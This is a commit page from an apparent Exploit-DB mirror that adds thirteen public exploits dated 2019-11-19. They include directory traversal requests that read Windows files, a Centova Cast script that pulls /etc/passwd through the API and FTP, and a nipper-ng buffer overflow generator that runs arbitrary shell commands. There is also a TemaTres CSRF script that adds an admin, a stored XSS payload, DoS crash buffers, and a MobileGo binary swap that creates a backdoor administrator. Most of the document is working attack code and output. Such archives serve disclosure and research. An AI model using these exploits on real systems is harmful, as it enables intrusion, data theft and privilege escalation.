bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-11-19

Browse source 
13 changes to exploits/shellcodes

iSmartViewPro 1.3.34 - Denial of Service (PoC)
Open Proficy HMI-SCADA 5.0.0.25920 - 'Password' Denial of Service (PoC)
Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)
Emerson PAC Machine Edition 9.70 Build 8595 - 'FxControlRuntime' Unquoted Service Path
ASUS HM Com Service 1.00.31 - 'asHMComSvc' Unquoted Service Path
MobileGo 8.5.0 - Insecure File Permissions
NCP_Secure_Entry_Client 9.2 - Unquoted Service Paths

nipper-ng 0.11.10 - Remote Buffer Overflow (PoC)
Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal
Crystal Live HTTP Server 6.01 - Directory Traversal
Centova Cast 3.2.11 - Arbitrary File Download
TemaTres 3.0 - Cross-Site Request Forgery (Add Admin)
TemaTres 3.0 - 'value' Persistent Cross-site Scripting
This commit is contained in:
Offensive Security 2019-11-19 05:01:40 +00:00
parent 9ec37edbed
commit 3e9ff5a927
14 changed files with 755 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

27
exploits/asp/webapps/47666.txt Normal file
View file

@ -0,0 +1,27 @@
# Title: Crystal Live HTTP Server 6.01 - Directory Traversal
# Date of found: 2019-11-17
# Author: Numan Türle
# Vendor Homepage: https://www.genivia.com/
# Version : Crystal Quality 6.01.x.x
# Software Link : https://www.crystalrs.com/crystal-quality-introduction/
POC
---------
GET /../../../../../../../../../../../../windows/win.iniHTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Response
---------
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

142
exploits/hardware/webapps/47663.txt Normal file
View file

@ -0,0 +1,142 @@
# Exploit Title: Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal
# Google Dork: N/A
# Date: 2019-11-15
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.lexmark.com/en_us.html
# Software Link: https://www.lexmark.com/en_us.html
# Version: 2.27.4.0.39 (Latest Version)
# Tested on: Windows Server 2012
# CVE : N/A
Vulnerability: Lexmark Services Monitor (Version 2.27.4.0.39) Runs on TCP Port 2070. The latest version is vulnerable to a Directory Traversal and Local File Inclusion vulnerability.
Timeline:
Discovered on: 9/24/2019
Vendor Notified: 9/24/2019
Vendor Confirmed Receipt of Vulnerability: 9/24/2019
Follow up with Vendor: 9/25/2019
Vendor Sent to Engineers to confirm validity: 9/25/2019 - 9/26/2019
Vendor Confirmed Vulnerability is Valid: 9/26/2019
Vendor Said Software is EOL (End of Life). Users should upgrade/migrate all LSM with LRAM. No fix/patch will be made: 9/27/2019
Vendor Confirmed Signoff to Disclose: 9/27/2019
Final Email Sent: 9/27/2019
Public Disclosure: 11/15/2019
PoC:
GET /../../../../../../windows/SysWOW64/PerfStringBackup.ini HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 10.200.15.70:2070
User-Agent: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20
HTTP/1.0 200 OK
Server: rXpress
Content-Length: 848536
.
.
.
.[.P.e.r.f.l.i.b.].
.
.B.a.s.e. .I.n.d.e.x.=.1.8.4.7.
.
.L.a.s.t. .C.o.u.n.t.e.r.=.3.3.3.4.6.
.
.L.a.s.t. .H.e.l.p.=.3.3.3.4.7.
.
.
.
.[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].
.
.F.i.r.s.t. .C.o.u.n.t.e.r.=.5.0.2.8.
.
.F.i.r.s.t. .H.e.l.p.=.5.0.2.9.
.
.L.a.s.t. .C.o.u.n.t.e.r.=.5.0.4.0.
.
.L.a.s.t. .H.e.l.p.=.5.0.4.1.
.
.
.
.[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].
.
.F.i.r.s.t. .C.o.u.n.t.e.r.=.4.9.8.6.
GET /../../../../../windows/SysWOW64/slmgr/0409/slmgr.ini HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 10.200.15.70:2070
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.3
HTTP/1.0 200 OK
Server: rXpress
Content-Length: 38710
..[.S.t.r.i.n.g.s.].
.
.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".i.p.k.".
.
.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".I.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y. .(.r.e.p.l.a.c.e.s. .e.x.i.s.t.i.n.g. .k.e.y.).".
.
.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".u.p.k.".
.
.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".U.n.i.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y.".
.
.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.=.".a.t.o.".
.
.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.U.s.a.g.e.=.".A.c.t.i.v.a.t.e. .W.i.n.d.o.w.s.".
.
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.=.".d.l.i.".
.
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.=.".D.i.s.p.l.a.y. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".
.
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.V.e.r.b.o.s.e.=.".d.l.v.".
.
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.V.e.r.b.o.s.e.=.".D.i.s.p.l.a.y. .d.e.t.a.i.l.e.d. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".
.
.L._.o.p.t.E.x.p.i.r.a.t.i.o.n.D.a.t.i.m.e.=.".x.p.r.".
GET /../../../../../windows/system32/drivers/etc/services HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 10.200.15.70:2070
User-Agent: Opera/9.50 (Macintosh; Intel Mac OS X; U; de)
HTTP/1.0 200 OK
Server: rXpress
Content-Length: 17463
# Copyright (c) 1993-2004 Microsoft Corp.
#
# This file contains port numbers for well-known services defined by IANA
#
# Format:
#
# <service name> <port number>/<protocol> [aliases...] [#<comment>]
#
echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp users #Active users
systat 11/udp users #Active users
daytime 13/tcp
daytime 13/udp
qotd 17/tcp quote #Quote of the day
qotd 17/udp quote #Quote of the day
chargen 19/tcp ttytst source #Character generator
chargen 19/udp ttytst source #Character generator
ftp-data 20/tcp #FTP, data
ftp 21/tcp #FTP. control
ssh 22/tcp #SSH Remote Login Protocol
telnet 23/tcp
smtp 25/tcp mail #Simple Mail Transfer Protocol
time 37/tcp timserver

29
exploits/hardware/webapps/47669.sh Executable file
View file

@ -0,0 +1,29 @@
# Exploit Title: Centova Cast 3.2.11 - Arbitrary File Download
# Date: 2019-11-17
# Exploit Author: DroidU
# Vendor Homepage: https://centova.com
# Affected Version: <=v3.2.11
# Tested on: Debian 9, CentOS 7
#!/bin/bash
if [ "$4" = "" ]
then
echo "Usage: $0 centovacast_url user password ftpaddress"
exit
fi
url=$1
user=$2
pass=$3
ftpaddress=$4
dwn() {
curl -s -k "$url/api.php?xm=server.copyfile&f=json&a\[username\]=$user&a\[password\]=$pass&a\[sourcefile\]=$1&a\[destfile\]=1.tmp"
wget -q "ftp://$user:$pass@$ftpaddress/1.tmp" -O $2
}
dwn /etc/passwd passwd
echo "
/etc/passwd:
"
cat passwd

28
exploits/ios/dos/47665.py Executable file
View file

@ -0,0 +1,28 @@
# Exploit Title: Open Proficy HMI-SCADA 5.0.0.25920 - 'Password' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-16
# Vendor Homepage: https://apps.apple.com/us/app/proficyscada/id525792142
# Software Link: App Store for iOS devices
# GE Intelligent Platforms, Inc.
# Tested Version: 5.0.0.25920
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 13.2
# Steps to Produce the Crash:
# 1.- Run python code: Open_Proficy_HMI-SCADA_for_iOS_5.0.0.25920.py
# 2.- Copy content to clipboard
# 3.- Open "Open Proficy HMI-SCADA for iOS"
# 4.- Host List > "+"
# 5.- Add Host
# 6.- Address Type "IP Address"
# 7.- Host IP Address "192.168.1.1"
# 8.- User Name "l4m5"
# 9.- Paste ClipBoard on "Password"
# 10.- Add
# 11.- Connect
# 12.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 2500
print (buffer)

100
exploits/linux/remote/47673.py Executable file
View file

@ -0,0 +1,100 @@
# Exploit Title: nipper-ng 0.11.10 - Remote Buffer Overflow (PoC)
# Date: 2019-10-20
# Exploit Author: Guy Levin
# https://blog.vastart.dev
# Vendor Homepage: https://tools.kali.org/reporting-tools/nipper-ng
# Software Link: https://code.google.com/archive/p/nipper-ng/source/default/source
# Version: 0.11.10
# Tested on: Debian
# CVE : CVE-2019-17424
"""
Exploit generator created by Guy Levin (@va_start - twitter.com/va_start)
Vulnerability found by Guy Levin (@va_start - twitter.com/va_start)
For a detailed writeup of CVE-2019-17424 and the exploit building process, read my blog post
https://blog.vastart.dev/2019/10/stack-overflow-cve-2019-17424.html
may need to run nipper-ng with enviroment variable LD_BIND_NOW=1 on ceratin systems
"""
import sys
import struct
def pack_dword(i):
return struct.pack("<I", i)
def prepare_shell_command(shell_command):
return shell_command.replace(" ", "${IFS}")
def build_exploit(shell_command):
EXPLOIT_SKELETON = r"privilage exec level 1 " \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa " \
"aasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaab " \
"kaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaacca " \
"acdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaac " \
"uaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadma " \
"adnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaae " \
"faaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewa " \
"aexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaaf " \
"paafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaagha " \
"agiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaag " \
"zaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahra " \
"ahaaaataahuaahvaahwaahpaaaaaaazaaibaaicaaidaaieaaifaaigaaihaaiiaaijaai " \
"kaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajca " \
"ajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaaj"
WRITEABLE_BUFFER = 0x080FA001
CALL_TO_SYSTEM = 0x0804E870
COMMAND_BUFFER = 0x080FA015
OFFSET_FOR_WRITEABLE_BUFFER = 0x326
OFFSET_FOR_RETURN = 0x33a
OFFSET_FOR_COMMAND_BUFFER = 0x33e
OFFSET_FOR_SHELL_COMMAND = 0x2a
MAX_SHELL_COMMAND_CHARS = 48
target_values_at_offsets = {
WRITEABLE_BUFFER : OFFSET_FOR_WRITEABLE_BUFFER,
CALL_TO_SYSTEM : OFFSET_FOR_RETURN,
COMMAND_BUFFER : OFFSET_FOR_COMMAND_BUFFER
}
exploit = bytearray(EXPLOIT_SKELETON, "ascii")
# copy pointers
for target_value, target_offset in target_values_at_offsets.items():
target_value = pack_dword(target_value)
exploit[target_offset:target_offset+len(target_value)] = target_value
# copy payload
if len(shell_command) > MAX_SHELL_COMMAND_CHARS:
raise ValueError("shell command is too big")
shell_command = prepare_shell_command(shell_command)
if len(shell_command) > MAX_SHELL_COMMAND_CHARS:
raise ValueError("shell command is too big after replacing spaces")
# adding padding to end of shell command
for i, letter in enumerate(shell_command + "&&"):
exploit[OFFSET_FOR_SHELL_COMMAND+i] = ord(letter)
return exploit
def main():
if len(sys.argv) != 3:
print(f"usage: {sys.argv[0]} <shell command to execute> <output file>")
return 1
try:
payload = build_exploit(sys.argv[1])
except Exception as e:
print(f"error building exploit: {e}")
return 1
open(sys.argv[2], "wb").write(payload)
return 0 # success
if __name__ == '__main__':
main()

74
exploits/php/webapps/47670.txt Normal file
View file

@ -0,0 +1,74 @@
# Exploit Title: TemaTres 3.0 — Cross-Site Request Forgery (Add Admin)
# Author: Pablo Santiago
# Date: 2019-11-14
# Vendor Homepage: https://www.vocabularyserver.com/
# Source: https://sourceforge.net/projects/tematres/files/TemaTres%203.0/tematres3.0.zip/download
# Version: 3.0
# CVE : 201914345
# Reference:https://medium.com/@Pablo0xSantiago/cve-2019-14345-ff6f6d9fd30f
# Tested on: Windows 10
# Description:
# Web application for management formal representations of knowledge,
# thesauri, taxonomies and multilingual vocabularies / Aplicación para
# la gestión de representaciones formales del conocimiento, tesauros,
# taxonomías, vocabularios multilingües.
#Exploit
import requests
import sys
session = requests.Session()
http_proxy = “http://127.0.0.1:8080"
https_proxy = “https://127.0.0.1:8080"
proxyDict = {
“http” : http_proxy,
“https” : https_proxy
}
url = http://localhost/tematres/vocab/login.php'
values = {id_correo_electronico: pablo@tematres.com,
id_password: admin,
task:login}
r = session.post(url, data=values, proxies=proxyDict)
cookie = session.cookies.get_dict()[PHPSESSID]
print (cookie)
host = sys.argv[1]
user = input([+]User:)
lastname = input([+]lastname:)
password = input([+]Password:)
password2 = input([+]Confirm Password:)
email = input([+]Email:)
if (password == password2):
#configure proxy burp
data = {
_nombre:user,
_apellido:lastname,
_correo_electronico:email,
orga:bypassed,
_clave:password,
_confirmar_clave:password2,
isAdmin:1,
boton:Guardar,
userTask:A,
useactua:
}
headers= {
Cookie: PHPSESSID=+cookie
}
request = session.post(host+/tematres/vocab/admin.php, data=data,
headers=headers, proxies=proxyDict)
print(+ — — — — — — — — — — — — — — — — — — — — — — — — — +)
print(Status Code:+ str(request.status_code))
else:
print (Passwords dont match!!!)

30
exploits/php/webapps/47672.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: TemaTres 3.0 - 'value' Persistent Cross-site Scripting
# Author: Pablo Santiago
# Date: 2019-11-14
# Vendor Homepage: https://www.vocabularyserver.com/
# Source: https://sourceforge.net/projects/tematres/files/TemaTres%203.0/tematres3.0.zip/download
# Version: 3.0
# CVE : 201914343
# Reference: https://medium.com/@Pablo0xSantiago/cve-2019-14343-ebc120800053
# Tested on: Windows 10
#Description:
The parameter "value" its vulnerable to Stored Cross-site scripting..
#Payload: “><script>alert(“XSS”)<%2fscript>
POST /tematres3.0/vocab/admin.php?vocabulario_id=list HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0)
Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/tematres3.0/vocab/admin.php?vocabulario_id=list
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Connection: close
Cookie: PHPSESSID=uejtn72aavg5eit9sc9bnr2jse
Upgrade-Insecure-Requests: 1
doAdmin=&valueid=&value=12vlpcv%22%3e%3cscript%3ealert(%22XSS%22)%3c%2fscript%3edx6e1&alias=ACX&orden=2

37
exploits/windows/dos/47662.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: iSmartViewPro 1.3.34 - Denial of Service (PoC)
# Discovery by: Ivan Marmolejo
# Discovery Date: 2019 -11-16
# Vendor Homepage: http://www.smarteyegroup.com/
# Software Link: https://apps.apple.com/mx/app/ismartviewpro/id834791071
# Tested Version: 1.3.34
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 6s - iOS 13.2
##############################################################################################################################################
Summary: This app is specially built for P2P IP camera series. thanks to unique P2P connection technology that users are able to watch live
video on iPhone from any purchased IP camera by simply enter camera's ID and password; no complex IP or router settings. The app have a lot of
functions, such as local record video, set ftp params, set email, set motion alarm and so on.
##############################################################################################################################################
Steps to Produce the Crash:
1.- Run python code: iSmartViewPro.py
2.- Copy content to clipboard
3.- Open App "iSmartViewPro"
4.- Go to "Add Camera"
5.- go to "Add network cameras"
6.- Paste ClipBoard on "Camara DID"
7.- Paste ClipBoard on "Password"
8.- Next
9.- Crashed
##############################################################################################################################################
Python "iSmartViewPro" Code:
buffer = "\x41" * 257
print (buffer)
##############################################################################################################################################

23
exploits/windows/dos/47671.py Executable file
View file

@ -0,0 +1,23 @@
# Exploit Title: Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)
# Author: chuyreds
# Discovery Date: 2019-11-16
# Vendor Homepage: https://www.foscam.es/
# Software Link : https://www.foscam.es/descarga/FoscamVMS_1.1.4.9.zip
# Tested Version: 1.1.4.9
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python foscam-vms-uid-dos.py
# 2.- Open FoscamVMS1.1.4.9.txt and copy its content to clipboard
# 3.- Open FoscamVMS
# 4.- Go to Add Device
# 5.- Choose device type "NVR"/"IPC"
# 6.- Copy the content of the file into Username
# 7.- Click on Login Check
# 8.- Crashed
buffer = "\x41" * 520
f = open ("FoscamVMS_1.1.4.9.txt", "w")
f.write(buffer)
f.close()

34
exploits/windows/local/47661.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: Emerson PAC Machine Edition 9.70 Build 8595 - 'FxControlRuntime' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-17
# Vendor Homepage: https://www.emerson.com/en-us
# Software Link : https://www.opertek.com/descargar-software/?prc=_326
# Tested Version: 9.70 Build 8595
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "FxControlRuntime" |findstr /i /v """
FxControl Runtime FxControlRuntime C:\Program Files (x86)\Emerson\PAC Machine Edition\fxControl\Runtime\NT\FxControl.exe Auto
# Service info:
C:\>sc qc FxControlRuntime
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: FxControlRuntime
TYPE : 120 WIN32_SHARE_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Emerson\PAC Machine Edition\fxControl\Runtime\NT\FxControl.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : FxControl Runtime
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

31
exploits/windows/local/47664.txt Normal file
View file

@ -0,0 +1,31 @@
# Exploit Title: ASUS HM Com Service 1.00.31 - 'asHMComSvc' Unquoted Service Path
# Date: 2019-11-16
# Exploit Author : Olimpia Saucedo
# Vendor Homepage: www.asus.com
# Version: 1.00.31
# Tested on: Windows 10 Pro x64 (but it should works on all windows version)
The application suffers from an unquoted service path issue impacting the service 'ASUS HM Com Service (aaHMSvc.exe)' related to the Asus Motherboard Utilities.
This could potentially allow an authorized but non-privileged local user to execute arbitrary code with system privileges.
POC:
>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
ASUS HM Com Service asHmComSvc
C:\Program Files (x86)\ASUS\AAHM\1.00.31\aaHMSvc.exe
Auto
>sc qc "asHMComSvc"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: asHMComSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\ASUS\AAHM\1.00.31\aaHMSvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ASUS HM Com Service
DEPENDENCIES : RpcSs
SERVICE_START_NAME : LocalSystem

102
exploits/windows/local/47667.txt Normal file
View file

@ -0,0 +1,102 @@
# Exploit Title: MobileGo 8.5.0 - Insecure File Permissions
# Exploit Author: ZwX
# Exploit Date: 2019-11-15
# Vendor Homepage : https://www.wondershare.net/
# Software Link: https://www.wondershare.net/mobilego/
# Tested on OS: Windows 7
# Proof of Concept (PoC):
==========================
C:\Program Files\Wondershare\MobileGo>icacls *.exe
adb.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
APKInstaller.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
BsSndRpt.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
DriverInstall.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
fastboot.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
FetchDriver.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
MGNotification.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
MobileGo.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
MobileGoService.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
unins000.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
URLReqService.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
WAFSetup.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
WsConverter.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
WsMediaInfo.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
#Exploit code(s):
=================
1) Compile below 'C' code name it as "MobileGo.exe"
#include<windows.h>
int main(void){
system("net user hacker abc123 /add");
system("net localgroup Administrators hacker /add");
system("net share SHARE_NAME=c:\ /grant:hacker,full");
WinExec("C:\\Program Files\\Wondershare\\MobileGo\\~MobileGo.exe",0);
return 0;
}
2) Rename original "MobileGo.exe" to "~MobileGo.exe"
3) Place our malicious "MobileGo.exe" in the MobileGo directory
4) Disconnect and wait for a more privileged user to connect and use MobileGo IDE.
Privilege Successful Escalation

85
exploits/windows/local/47668.txt Normal file
View file

@ -0,0 +1,85 @@
# Exploit Title: NCP_Secure_Entry_Client 9.2 - Unquoted Service Paths
# Date: 2019-11-17
# Exploit Author: Akif Mohamed Ik
# Vendor Homepage: http://software.ncp-e.com/
# Software Link: http://software.ncp-e.com/NCP_Secure_Entry_Client/Windows/9.2x/
# Version: 9.2x
# Tested on: Windows 7 SP1
# CVE : NA
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
ncprwsnt ncprwsnt
C:\Program Files (x86)\NCP\SecureClient\ncprwsnt.exe
Auto
rwsrsu rwsrsu
C:\Program Files (x86)\NCP\SecureClient\rwsrsu.exe
Auto
ncpclcfg ncpclcfg
C:\Program Files (x86)\NCP\SecureClient\ncpclcfg.exe
Auto
NcpSec NcpSec
C:\Program Files (x86)\NCP\SecureClient\NCPSEC.EXE
Auto
C:\Users\ADMIN>sc qc ncprwsnt
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ncprwsnt
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\ncprwsnt.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ncprwsnt
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\ADMIN>sc qc rwsrsu
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME : rwsrsu
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\rwsrsu.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : rwsrsu
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\ADMIN>sc qc ncpclcfg
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME : ncpclcfg
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\ncpclcfg.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ncpclcfg
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\ADMIN>sc qc NcpSec
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME : NcpSec
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\NCPSEC.EXE
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : NcpSec
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other
security applications where it could potentially be executed during
application startup or reboot. If successful, the local user's code
would execute with the elevated privileges of the application.

13
files_exploits.csv
View file

@ -6594,6 +6594,9 @@ id,file,description,date,author,type,platform,port
47609,exploits/windows/dos/47609.txt,"Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed JBIG2Globals Stream",2019-11-11,"Google Security Research",dos,windows,
47610,exploits/windows/dos/47610.txt,"Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed OTF Font (CFF Table)",2019-11-11,"Google Security Research",dos,windows,
47657,exploits/hardware/dos/47657.txt,"Siemens Desigo PX 6.00 - Denial of Service (PoC)",2019-11-14,LiquidWorm,dos,hardware,
47662,exploits/windows/dos/47662.txt,"iSmartViewPro 1.3.34 - Denial of Service (PoC)",2019-11-18,"Ivan Marmolejo",dos,windows,
47665,exploits/ios/dos/47665.py,"Open Proficy HMI-SCADA 5.0.0.25920 - 'Password' Denial of Service (PoC)",2019-11-18,"Luis Martínez",dos,ios,
47671,exploits/windows/dos/47671.py,"Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)",2019-11-18,chuyreds,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10774,6 +10777,10 @@ id,file,description,date,author,type,platform,port
47656,exploits/windows/local/47656.txt,"ScanGuard Antivirus 2020 - Insecure Folder Permissions",2019-11-13,hyp3rlinx,local,windows,
47658,exploits/windows/local/47658.txt,"oXygen XML Editor 21.1.1 - XML External Entity Injection",2019-11-14,"Pablo Santiago",local,windows,
47660,exploits/windows/local/47660.txt,"Shrew Soft VPN Client 2.2.2 - 'iked' Unquoted Service Path",2019-11-15,D.Goedecke,local,windows,
